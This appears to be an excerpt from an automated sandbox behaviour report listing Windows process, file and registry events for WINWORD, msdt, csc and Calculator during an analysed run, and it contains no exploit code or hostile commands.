Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\k20rbpet\k20rbpet.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gq51tajz\gq51tajz.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_390ebd66-1039-4677-8a3d-dc2b831785c8\DiagPackage.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_390ebd66-1039-4677-8a3d-dc2b831785c8\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gicpsj5r\gicpsj5r.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qjydgt0v\qjydgt0v.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gq51tajz\gq51tajz.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\k20rbpet\k20rbpet.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1402 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 761 Jump to behavior
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EF0.tmp" "c:\Users\user\AppData\Local\Temp\qjydgt0v\CSCF686346A26FD430292162641BEBDEE9.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECF.tmp" "c:\Users\user\AppData\Local\Temp\k20rbpet\CSCE7B22EE4778740AF867136D9AB1FA733.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8F43.tmp" "c:\Users\user\AppData\Local\Temp\gq51tajz\CSC3BD1B1444E1C48ADB45F58F4D21E85A7.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD768.tmp" "c:\Users\user\AppData\Local\Temp\gicpsj5r\CSCDCDF82AFC84E4F03B728563353CFAD3C.TMP" Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs